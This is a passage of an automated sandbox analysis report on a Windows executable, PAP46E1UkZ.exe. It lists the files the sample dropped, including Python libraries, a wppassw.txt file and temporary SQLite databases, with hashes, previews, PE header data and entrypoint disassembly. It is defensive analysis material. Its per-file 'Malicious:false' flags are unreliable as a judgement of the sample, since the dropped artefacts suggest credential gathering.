                                                                                                                                                                                                                            Size (bytes):2869
                                                                                                                                                                                                                            Entropy (8bit):4.534411891756618
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:48:l9Zvy3g6yj+DsmnA540rZh2Phv4hhpTSeToq:xPAorZoP94hTTSecq
                                                                                                                                                                                                                            MD5:629278048EF5BF7880A43409D136981D
                                                                                                                                                                                                                            SHA1:04BC1062E0800A8570F1C81751B734E81FA9BBCB
                                                                                                                                                                                                                            SHA-256:96478968ADB5BE5B92DB2ECC7E63BFB5B2D88E1F2F6990E066CC33538243F608
                                                                                                                                                                                                                            SHA-512:31EB224235746AAFD44FEB872A5743FBED78F2B21317C81A31E5CFB076E67378518C32E09EB92DC5D52BB9863F322924B21F17A636EBDAA4AF027FE24D68D50F
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:[distutils.commands].alias = setuptools.command.alias:alias.bdist_egg = setuptools.command.bdist_egg:bdist_egg.bdist_rpm = setuptools.command.bdist_rpm:bdist_rpm.build_clib = setuptools.command.build_clib:build_clib.build_ext = setuptools.command.build_ext:build_ext.build_py = setuptools.command.build_py:build_py.develop = setuptools.command.develop:develop.dist_info = setuptools.command.dist_info:dist_info.easy_install = setuptools.command.easy_install:easy_install.egg_info = setuptools.command.egg_info:egg_info.install = setuptools.command.install:install.install_egg_info = setuptools.command.install_egg_info:install_egg_info.install_lib = setuptools.command.install_lib:install_lib.install_scripts = setuptools.command.install_scripts:install_scripts.rotate = setuptools.command.rotate:rotate.saveopts = setuptools.command.saveopts:saveopts.sdist = setuptools.command.sdist:sdist.setopt = setuptools.command.setopt:setopt.test = setuptools.command.test:test.upload_docs = setuptools.comman

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI70922\setuptools-57.4.0.dist-info\top_level.txt

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\PAP46E1UkZ.exe
                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):41
                                                                                                                                                                                                                            Entropy (8bit):3.9115956018096876
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:3Wd+Nt8AfQYv:3Wd+Nttv
                                                                                                                                                                                                                            MD5:789A691C859DEA4BB010D18728BAD148
                                                                                                                                                                                                                            SHA1:AEF2CBCCC6A9A8F43E4E150E7FCF1D7B03F0E249
                                                                                                                                                                                                                            SHA-256:77DC8BDFDBFF5BBAA62830D21FAB13E1B1348FF2ECD4CDCFD7AD4E1A076C9B88
                                                                                                                                                                                                                            SHA-512:BC2F7CAAD486EB056CB9F68E6C040D448788C3210FF028397CD9AF1277D0051746CAE58EB172F9E73EA731A65B2076C6091C10BCB54D911A7B09767AA6279EF6
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:_distutils_hack.pkg_resources.setuptools.

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI70922\sqlite3.dll

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\PAP46E1UkZ.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1538792
                                                                                                                                                                                                                            Entropy (8bit):6.567710275082368
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24576:evKXB9kVI7EekT9T/m8roZ+QxW+DpzpGq86pMjPip8lwHozQhI+BJR5e5cYD:ei32I7E9T9T/m8roZnptGq5p82/I+fiZ
                                                                                                                                                                                                                            MD5:1169F60BD0D1414BC3B34DC6B9869665
                                                                                                                                                                                                                            SHA1:43AC03C17BEF6D65FE835E00DEAFE5CB826C5178
                                                                                                                                                                                                                            SHA-256:D9665F17D9B1D03408A591F5534A373082DD965D7334ED660F5F61CFCF67DC3A
                                                                                                                                                                                                                            SHA-512:58BB9D4F446FD9C9CBDF735A099F2F41BD34C1B265DB88EA1F0D6C5B83EF1EEA4A2EE888F573A365E44DAC174E07A9E2007719645436C08E84FB7C2ABC02FF3B
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........l.f.?.f.?.f.?..k?.f.?...>.f.?...>.f.?...>.f.?...>.f.?...>.f.?.f.?.f.?X..>.f.?X..>.f.?X..?.f.?X..>.f.?Rich.f.?........................PE..d...x>-a.........." .....b...........a..............................................X_....`.........................................p.... ..`>.......................^..............p...T..............................8............................................text....`.......b.................. ..`.rdata...............f..............@..@.data....6...P...,...2..............@....pdata...............^..............@..@.rsrc................H..............@..@.reloc...............R..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI70922\ucrtbase.dll

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\PAP46E1UkZ.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1017720
                                                                                                                                                                                                                            Entropy (8bit):6.638795525512885
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24576:ZLyubutYBWSlhrANUDk8ExrmxvSZX0ypFiR+o:dyubJvlhrVETiR+o
                                                                                                                                                                                                                            MD5:9679F79D724BCDBD3338824FFE8B00C7
                                                                                                                                                                                                                            SHA1:5DED91CC6E3346F689D079594CF3A9BF1200BD61
                                                                                                                                                                                                                            SHA-256:962C50AFCB9FBFD0B833E0D2D7C2BA5CB35CD339ECF1C33DDFB349253FF95F36
                                                                                                                                                                                                                            SHA-512:74AC8DEB4A30F623AF1E90E594D66FE28A1F86A11519C542C2BAD44E556B2C5E03D41842F34F127F8F7F7CB217A6F357604CB2DC6AA5EDC5CBA8B83673D8B8BD
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......n.Pc*.>0*.>0*.>0#..0..>0*.?0..>0O..0+.>0O.>1+.>0O.=1..>0O.;1p.>0O.01..>0O.:1d.>0O..0+.>0O.<1+.>0Rich*.>0........................PE..d....A.0.........." .........b.......6....................................................`A........................................ ...........................H....d..x#......p....y..T............................B...............o...............................text............................... ..`.rdata...w...0...x..................@..@.data....$..........................@....pdata..H...........................@..@.rsrc................R..............@..@.reloc..p............X..............@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI70922\unicodedata.pyd

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\PAP46E1UkZ.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1121512
                                                                                                                                                                                                                            Entropy (8bit):5.373359326679334
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12288:bezMmuZ63N7QCb5Pfhnzr0ql8L8kkM7IRG5eeme6VZyrIBHdQLhfFE+uE1SJ:bezusZV0m88MMREtV6Vo4uYEgJ
                                                                                                                                                                                                                            MD5:87F3E3CF017614F58C89C087F63A9C95
                                                                                                                                                                                                                            SHA1:0EDC1309E514F8A147D62F7E9561172F3B195CD7
                                                                                                                                                                                                                            SHA-256:BA6606DCDF1DB16A1F0EF94C87ADF580BB816105D60CF08BC570B17312A849DA
                                                                                                                                                                                                                            SHA-512:73F00F44239B2744C37664DBF2B7DF9C178A11AA320B9437055901746036003367067F417414382977BF8379DF8738C862B69D8D36C6E6AA0B0650833052C85F
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........N$~./J-./J-./J-.W.-./J-.ZK,./J-.ZO,./J-.ZN,./J-.ZI,./J-_ZK,./J-.DK,./J-./K-./J-_ZG,./J-_ZJ,./J-_Z.-./J-_ZH,./J-Rich./J-........PE..d...a>-a.........." .....J..........T).......................................@......s.....`.........................................p...X............ .......................0......`L..T............................L..8............`...............................text....I.......J.................. ..`.rdata.......`.......N..............@..@.data...............................@....pdata..............................@..@.rsrc........ ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI70922\win32api.pyd

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\PAP46E1UkZ.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):134656
                                                                                                                                                                                                                            Entropy (8bit):5.844921864804763
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3072:Ag3Ke7MAgKmvDKsMLMsAv0b2nRHzspVJ4fcuQr4MhnVL7e:me7JgKmvDwSnRTspVpuWtVL
                                                                                                                                                                                                                            MD5:C2C0FA32E01F7BC4542BF96E0CC3FFE5
                                                                                                                                                                                                                            SHA1:6B2733B08351442F27FF943C3FACCF45378A87EB
                                                                                                                                                                                                                            SHA-256:2AB33CCA6227C6A2D5D9CC5E694A678A292B3B26E299CB94343A466900D7014C
                                                                                                                                                                                                                            SHA-512:311F94646E76247CE3DB8B73F47A8F56ABE7B8F34DF642E40BD7842B6609814EC99BF4A500E8C5FBBB0F88FC25413B7C5516CDD9B7CCACEA872317CDE1A1BBD5
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........A$f. J5. J5. J5.X.5. J5.~K4. J5.~I4. J5.~N4. J5'~K4. J5.IK4. J5.~O4. J5.BK4. J5. K5.!J5'~O4. J5'~J4. J5'~H4. J5Rich. J5................PE..d.....a.........." ................H........................................`............`.........................................`...............@..T....................P.......~..T...........................P}............... .........@....................text............................... ..`.rdata..|.... ......................@..@.data....#......."..................@....pdata..............................@..@.gfids..4....0......................@..@.rsrc...T....@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI70922\win32com\shell\shell.pyd

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\PAP46E1UkZ.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):527872
                                                                                                                                                                                                                            Entropy (8bit):6.108382932683241
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6144:ZOt5a4SrlGWtK/43u8IBc2deJKW1s+g7UQoTpmMHsRY5p0u9MxAw:ZOt5a4S8WtK/43uL+2u1VAFoTFHiO
                                                                                                                                                                                                                            MD5:1D212E628D6806C2A7C8FAB453171E6D
                                                                                                                                                                                                                            SHA1:F2112CA850678D8C2A27C06CF2096B7732683F78
                                                                                                                                                                                                                            SHA-256:0EEF0563EB7DCA7DF0A608E6380F5757E37DEAFE80D45C3DB74DF983A0759403
                                                                                                                                                                                                                            SHA-512:0AFE4735E7E1FD7F604B0938B2C6A15A84D5DFC21DE6B1118E1CEF4918C2AAF24A529B2B883B5E1C460CB4560ED64888C2446EF2B449F29E40900288DD158B6C
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:..Z~.e.~.e.~.e.w...x.e.E.d.|.e.E.f.|.e.E.`.o.e.E.a.v.e...d.z.e...d.|.e...c.u.e...d.w.e.~.d...e...`.8.e...e...e...g...e.Rich~.e.................PE..d......a.........." ......................................................................`.........................................@...L...............D.......Hf..............$!......T...........................0................ ...............................text............................... ..`.rdata....... ......................@..@.data...H....@...^... ..............@....pdata..Hf.......h...~..............@..@.gfids..4...........................@..@.rsrc...D...........................@..@.reloc..$!......."..................@..B........................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI70922\win32trace.pyd

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\PAP46E1UkZ.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):22528
                                                                                                                                                                                                                            Entropy (8bit):5.169439482134203
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:384:64/HrHtVds3ouGFV8fuE0T82r9NNNq/u9vnUgxVdn8XX1BR:rrQs59NNNq29ffn8XlB
                                                                                                                                                                                                                            MD5:F34B771ACB8512BFD8BECC8F1A39C061
                                                                                                                                                                                                                            SHA1:6472A79FE8A4260DC41A909A4260231D175AD772
                                                                                                                                                                                                                            SHA-256:CE7F941B40523F4C6BFCDAE67F67143DC3BE701FD878BBDFA6C86F4CD2D926BF
                                                                                                                                                                                                                            SHA-512:89A61C15E6046CE0B58C6B44824354EC0ABEC2CF24E29CED0E2A0C743BBBE53D69FE196EAE3B3482C08B29908EED0163A123F4F856DD1E3352D1D93ED77F9C63
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................."..........................................................................Rich............PE..d.....a.........." .....&.......... (....................................................`.........................................pP..T....P..........\....p..`...............x....H..T...........................0I...............@...............................text....%.......&.................. ..`.rdata..l....@.......*..............@..@.data........`.......F..............@....pdata..`....p.......L..............@..@.gfids...............P..............@..@.rsrc...\............R..............@..@.reloc..x............V..............@..B........................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI70922\win32ui.pyd

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\PAP46E1UkZ.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1428480
                                                                                                                                                                                                                            Entropy (8bit):5.320745803171948
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12288:4kj6OCxkzi0xCiHr53W4ngQ0B+66AgPh8+h22lAX8d/S61j:/j6OCSziSCon2l6Hhm2lv/S6
                                                                                                                                                                                                                            MD5:110CD1F63773427E28A52AAA7C9A6362
                                                                                                                                                                                                                            SHA1:2DD41E0BBFFFF838CF9841E2B6093C6EDD281636
                                                                                                                                                                                                                            SHA-256:4A1B69570827085BB04EA5A3079ABCC13FC4F7B4B5A72B1EE1C8F8B2CE86C3EE
                                                                                                                                                                                                                            SHA-512:5A05FB8BF9D34CF54CDE0D02235C030FFF0D692B9478BB01005A43E24C128F2C8508464CECD127609E9392A1DA202EF9CC0DBA5422FD73FDFA1E2E44DE99DAE2
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Z.G.;...;...;...CB..;...e...;...Y...;...e...;...e...;...e...;...e...;..8R...;...;...=...e...;...e...;...e...;...e...;..Rich.;..........................PE..d...^..a.........." .....z...N......h.....................................................`......................................... a...T..(...h............0............... ..@]......T.......................(...`....................0...........................text....y.......z.................. ..`.rdata..tx.......z...~..............@..@.data...............................@....pdata.......0......................@..@.gfids..@............P..............@..@.tls.................R..............@....rsrc................T..............@..@.reloc..@]... ...^...n..............@..B........................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\mpvxolbz

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\PAP46E1UkZ.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):4
                                                                                                                                                                                                                            Entropy (8bit):2.0
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:qn:qn
                                                                                                                                                                                                                            MD5:3F1D1D8D87177D3D8D897D7E421F84D6
                                                                                                                                                                                                                            SHA1:DD082D742A5CB751290F1DB2BD519C286AA86D95
                                                                                                                                                                                                                            SHA-256:F02285FB90ED8C81531FE78CF4E2ABB68A62BE73EE7D317623E2C3E3AEFDFFF2
                                                                                                                                                                                                                            SHA-512:2AE2B3936F31756332CA7A4B877D18F3FCC50E41E9472B5CD45A70BEA82E29A0FA956EE6A9EE0E02F23D9DB56B41D19CB51D88AAC06E9C923A820A21023752A9
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:blat

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\wppassw.txt

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\PAP46E1UkZ.exe
                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):13
                                                                                                                                                                                                                            Entropy (8bit):2.4116022179746714
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:vvyy:Xr
                                                                                                                                                                                                                            MD5:77F7BCB9D5C7B27AE6316F710A180908
                                                                                                                                                                                                                            SHA1:404BFB0F6CD6E0297F3640C62321ECDECAD28E08
                                                                                                                                                                                                                            SHA-256:70E98F126919D9DC5607FC9273A250EA2784F4645408FDF3F59D8DD7776A8D53
                                                                                                                                                                                                                            SHA-512:E94BAD9E54A29A8F2BDC4191755B450E11FF066788BA18E21C21175CCE0C693A81C94DCE439832BF97EB1EC420E311872689388AA5CD8D65A85C63BA375C50E4
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:<--xxx-->....

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Tempwpccvndwmn.db

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\PAP46E1UkZ.exe
                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3038005, file counter 17, database pages 7, 1st free page 5, free pages 2, cookie 0x13, schema 4, UTF-8, version-valid-for 17
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):28672
                                                                                                                                                                                                                            Entropy (8bit):1.4755077381471955
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:96:oesz0Rwhba5DX1tHQOd0AS4mcAMmgAU7MxTWbKSS:o+RwE55tHQOKB4mcmgAU7MxTWbNS
                                                                                                                                                                                                                            MD5:DEE86123FE48584BA0CE07793E703560
                                                                                                                                                                                                                            SHA1:E80D87A2E55A95BC937AC24525E51AE39D635EF7
                                                                                                                                                                                                                            SHA-256:60DB12643ECF5B13E6F05E0FBC7E0453D073E0929412E39428D431DB715122C8
                                                                                                                                                                                                                            SHA-512:65649B808C7AB01A65D18BF259BF98A4E395B091D17E49849573275B7B93238C3C9D1E5592B340ABCE3195F183943CA8FB18C1C6C2B5974B04FE99FCCF582BFB
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................[5.........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Tempwphfxcnmmh.db

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\PAP46E1UkZ.exe
                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):49152
                                                                                                                                                                                                                            Entropy (8bit):0.7876734657715041
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
                                                                                                                                                                                                                            MD5:CF7758A2FF4A94A5D589DEBAED38F82E
                                                                                                                                                                                                                            SHA1:D3380E70D0CAEB9AD78D14DD970EA480E08232B8
                                                                                                                                                                                                                            SHA-256:6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
                                                                                                                                                                                                                            SHA-512:1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            Static File Info

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Entropy (8bit):7.996105197330075
                                                                                                                                                                                                                            TrID:
                                                                                                                                                                                                                            • Win64 Executable GUI (202006/5) 92.65%
                                                                                                                                                                                                                            • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                                                                                                                                            • DOS Executable Generic (2002/1) 0.92%
                                                                                                                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                            File name:PAP46E1UkZ.exe
                                                                                                                                                                                                                            File size:17968187
                                                                                                                                                                                                                            MD5:0a6e31e8d7a0989f682b7ad92d489eb4
                                                                                                                                                                                                                            SHA1:04c0807d48680d66d84574413da9e85c2e3822aa
                                                                                                                                                                                                                            SHA256:e4e4cb8e87b66d2846563f0194da78c9e684cbf5deffd660525efcf0fd54a276
                                                                                                                                                                                                                            SHA512:99a78b000479b243b43139b19414294ed0ddaefca2d4fbe68eec1c52bfbd1356a681e249e26458cc38cbfc7c19005fcb019073ea46a0cbd7e4a06b4047610426
                                                                                                                                                                                                                            SSDEEP:393216:1au7L/WwAyXYPh8TInEroX/lh2plfEqirRRovon2P4j75QHOzl7:wCL+TyXYErUNQppwvMo2wZ
                                                                                                                                                                                                                            TLSH:A707331877541CBEF4B2503362318A31A2BBF86A9711DC4B2F2443171FA36D85EB9ED6
                                                                                                                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......@....ip..ip..ip...s..ip...u..ip...t..ip.b....ip.V.u.#ip.V.t..ip.V.s..ip...q..ip..iq..ip...t..ip...r..ip.Rich.ip................

                                                                                                                                                                                                                            File Icon

                                                                                                                                                                                                                            Icon Hash:b0cececece8e8eb0

                                                                                                                                                                                                                            Static PE Info

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Entrypoint:0x14000a688
                                                                                                                                                                                                                            Entrypoint Section:.text
                                                                                                                                                                                                                            Digitally signed:false
                                                                                                                                                                                                                            Imagebase:0x140000000
                                                                                                                                                                                                                            Subsystem:windows gui
                                                                                                                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                                                                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                            Time Stamp:0x618AB811 [Tue Nov 9 18:04:01 2021 UTC]
                                                                                                                                                                                                                            TLS Callbacks:
                                                                                                                                                                                                                            CLR (.Net) Version:
                                                                                                                                                                                                                            OS Version Major:5
                                                                                                                                                                                                                            OS Version Minor:2
                                                                                                                                                                                                                            File Version Major:5
                                                                                                                                                                                                                            File Version Minor:2
                                                                                                                                                                                                                            Subsystem Version Major:5
                                                                                                                                                                                                                            Subsystem Version Minor:2
                                                                                                                                                                                                                            Import Hash:5324ac1e1bceff69ec8d4435c50bfe0e

                                                                                                                                                                                                                            Entrypoint Preview

                                                                                                                                                                                                                            Instruction
                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                            sub esp, 28h
                                                                                                                                                                                                                            call 00007FEFCC68A17Ch
                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                            add esp, 28h
                                                                                                                                                                                                                            jmp 00007FEFCC689AFFh
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            inc eax
                                                                                                                                                                                                                            push ebx
                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                            sub esp, 20h
                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                            mov ebx, ecx
                                                                                                                                                                                                                            xor ecx, ecx
                                                                                                                                                                                                                            call dword ptr [0001EB1Bh]
                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                            mov ecx, ebx
                                                                                                                                                                                                                            call dword ptr [0001EB0Ah]
                                                                                                                                                                                                                            call dword ptr [0001EA7Ch]
                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                            mov ecx, eax
                                                                                                                                                                                                                            mov edx, C0000409h
                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                            add esp, 20h
                                                                                                                                                                                                                            pop ebx
                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                            jmp dword ptr [0001EB00h]
                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                            mov dword ptr [esp+08h], ecx
                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                            sub esp, 38h
                                                                                                                                                                                                                            mov ecx, 00000017h
                                                                                                                                                                                                                            call dword ptr [0001EAF4h]
                                                                                                                                                                                                                            test eax, eax
                                                                                                                                                                                                                            je 00007FEFCC689C89h
                                                                                                                                                                                                                            mov ecx, 00000002h
                                                                                                                                                                                                                            int 29h
                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                            lea ecx, dword ptr [0003F97Ah]
                                                                                                                                                                                                                            call 00007FEFCC689E4Eh
                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                            mov eax, dword ptr [esp+38h]
                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                            mov dword ptr [0003FA61h], eax
                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                            lea eax, dword ptr [esp+38h]
                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                            add eax, 08h
                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                            mov dword ptr [0003F9F1h], eax
                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                            mov eax, dword ptr [0003FA4Ah]
                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                            mov dword ptr [0003F8BBh], eax
                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                            mov eax, dword ptr [esp+40h]
                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                            mov dword ptr [0003F9BFh], eax
                                                                                                                                                                                                                            mov dword ptr [0003F895h], C0000409h
                                                                                                                                                                                                                            mov dword ptr [0003F88Fh], 00000001h
                                                                                                                                                                                                                            mov dword ptr [0003F899h], 00000001h

                                                                                                                                                                                                                            Data Directories

                                                                                                                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x39dcc0x78.rdata
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x500000x2c88.rsrc
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x4c0000x2064.pdata
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x530000x754.reloc
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x377600x1c.rdata
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x377800x138.rdata
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x290000x418.rdata
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                            Sections

                                                                                                                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                            .text0x10000x27af00x27c00False0.5595211772798742data6.483591160090979IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                            .rdata0x290000x11bd60x11c00False0.4998074383802817data5.7434766134684825IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
